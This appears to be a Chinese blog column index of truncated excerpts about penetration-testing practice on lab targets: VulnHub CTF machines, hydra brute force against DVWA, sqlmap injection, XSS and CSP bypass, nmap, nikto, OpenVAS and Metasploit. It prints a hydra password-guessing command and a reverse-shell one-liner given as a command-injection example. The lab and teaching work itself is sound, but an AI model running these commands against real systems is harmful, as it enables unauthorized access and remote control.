lm19770429的专栏

JIS-CTF题目描述靶场题目：JIS-CTF: VulnUpload 靶场地址：https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/ 难度描述：包含5个Flag，初级难度，查找所有Flag平均需要1.5小时 靶场作者：Mohammad Khreesha 靶场描述：Description: There are five flags on this machine. Try to find them. It takes 1.5 hour on

使用不同的语言环境连接到postgresql数据库提示postgresql的语言环境与系统不兼容解决办法：root用户权限下：localedef -f UTF-8 -i en_GB en_GB.UTF-8用提示错误的语言设置上述语句中的语言常量即可。如：en_US en_US.UTF-8安装postgresql数据库：sudo apt-get updatesudo ap...

靶机下载地址：Web Machine: (N7) ~ VulnHubWeb Machine: (N7), made by Duty Mastr. Download & walkthrough links are available.https://www.vulnhub.com/entry/web-machine-n7,756/Difficulty: Medium常规做法：arp-scan -I eth0 -l ：本地局域网IP地址扫描，个人感觉比nmap -sn 快nmap -A

靶场下载地址：The Planets: Earth ~ VulnHubThe Planets: Earth, made by SirFlash. Download & walkthrough links are available.https://www.vulnhub.com/entry/the-planets-earth,755/#downloadEarth is an easy box though you will likely find it more challenging t

抓包引擎• Libpcap9—— Linux• Winpcap10—— Windows

netcat-nc小名号称是瑞士军刀

xhydra是hydra的图形工具，本以为会很好用，但是世事艰辛这个工具在于字典的准备，下面留个记录，准备字典的过程。

XSS进阶之CSP绕过CSP：实质就是白名单制度，它规定哪些外部资源可以加载和执行。它的实现和执行全部由浏览器完成。资源加载通过”script-src“、”style-src”等选项来限制外部资源的加载。”script-src”限制外部脚本的加载，strict-dynamic特性允许将信任关系传递给由受信任的script动态生成的脚本，忽略了script-src的白名单，使得之后生成的脚本可以执行。...

跨站脚本攻击(Cross Site Scripting)，为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。 它与SQL注入攻击类似，SQL注入攻击中以SQL语句作为用户输入，从而达到查询/修改/删除数据的目的，而在xss攻击中，通过插入恶意脚本，实现对用户游览器的控制，获取用户的...

盲注，从字面意思理解就是看不见的注入，其实这还是属于注入的一种，只是表现形式不同。盲注是不能通过直接显示的途径来获取数据库数据的方法。在盲注中，攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同，也可以是响应时间不同)。也就是说执行插入的语句后，不管是否执行，是否成功，都不会回显详细的错误信息，不像普通注入一样那么容易判断。但是，注入攻击还是发生了，只是错误信息被屏蔽掉了，请记住这个就好。一般情况下，盲注可分为三类： Booleanbase普通盲注 Timebase...

-u 后面接url地址还可以用burpsuite导出的数据进行批量处理，如form-post形式的数据，用 -r burpsuite导出的数据包实战：目标网站：http://testphp.vulnweb.com/index.php必须先找到了个可以显示结果的注入点多浏览链接，如点击作者连接，找到注入点：http://testphp.vulnweb.com/artists.php?artist=2给地址后加个',出现以下错误界面，说明可以尝试注入接下来，检查注...

首先给出正确的暴力破解命令：hydra -l admin -P /usr/share/wordlists/metasploit/password.lst 10.10.10.143 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:Username and/or password incorrect.:H=Cookie: security=low;PHPSESS.

参考：Kali Linux 高级渗透测试（原书第2版）列出nikto可用插件：nikto -list-plugins | grep plugins定义代理：如burpnikto.pl -host <hostaddress> -port <hostport> -useragentnikto -useproxy http://127.0.0.1:8080可以通过运行以下命令将Nikto自定义为仅为Apache用户枚举运行的特定插件：当Nikto插件成功运行时，

参考资料为：Kali Linux 高级渗透测试（原书第2版）nmap的7.40， 附带500+NSE（ nmap脚本引擎） 脚本在启动nmap执行漏洞扫描之前， 渗透测试人员必须更新nmap脚本数据库， 查看是否有新脚本添加到数据库中， 防止错过该漏洞识别：针对目标主机运行所有脚本：LUA脚本介绍：LUA开发的安全工具有nmap、Wireshark和Snort 3.0等。LUA可以通过在终端上使用apt-get install lua5.1命令直接安装到KaliLinux。 以下代码

OpenVAS更新kaliapt-get updateapt-get dist-upgrade安装OpenVAS，这一步需要的时间非常久，需要下载很多文件，建议使用screen操作，避免shell中断apt-get install openvas安装配置OpenVASopenvas-setup注意查看结束的时候会有提示自动生成的密码User created with password '******'.如果安装的时候有错误可以进行安装检测，按照提示修复openvas-ch

hydra：据说也有图形界面看自身帮助绝对够用，关键是字典hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]-R 继续从上一次进度接着破解。-S 采用SSL链接。-s PORT 可通过这个参数指定非默认端口。-l L

Linux NFS共享目录配置漏洞靶机：metasploitable2查看靶机上的nfs服务是否开启：rpcinfo -p 10.10.10.129

Scapy是Python写的一个功能强大的交互式数据包处理程序，可用来发送、嗅探、解析和伪造网络数据包，常常被用到网络攻击和测试中。启动scapy。命令行输入scapy...

ping、arping、fping、hping3、nbtscan、nping、p0f、xprobe2工具对目标主机的探测方法探测工具：“ping –c 5 –s 2000 192.168.10.127”，发送5个大小为2000字节的数据包arping是一个在LAN中使用ARP地址解析协议发现目标主机的工具。arping工具测试特定IP地址在网络中是否在线。该命令只能运行本地局域网内，无...

漏洞利用：参考kali linux 渗透技术详解实验靶机：metasploitable2

客户端渗透

第三方网路服务渗透攻击实战：Oracle数据库

windows服务渗透攻击实战——MS08-067安全漏洞

内存攻防技术：

信息情报收集：

web应用渗透测试技术：

主要参考metasploit魔鬼训练营

w3af在kali2020下真心不好安装一路坑坑拌伴正常下载w3af，按要求解压在/root下安装NPM包管理工具apt install npm libyaml-dev libsqlite3-dev补全python库环境apt install python-dev build-essential libssl-dev libffi-dev libxml2-dev li...

web应用渗透测试技术：sqlmap：

可以参考我的CTF相关章节的命令注入如：sudo bash -i >& /etc/tcp/ip/port 0>&1

靶机应用地址：http://10.10.10.129/mutillidae/index.php想成功执行一个XSS有2步：攻击者数据没有被过滤掉、web应用返回的数据没有经过编码因此一个安全的web应用要对特殊字符进行编码，最好是进行十六进制编码。OWASP给出了防止XSS指南。国外网站不好访问，这里提供优快云的两个地址：https://blog.youkuaiyun.com/aerchi/...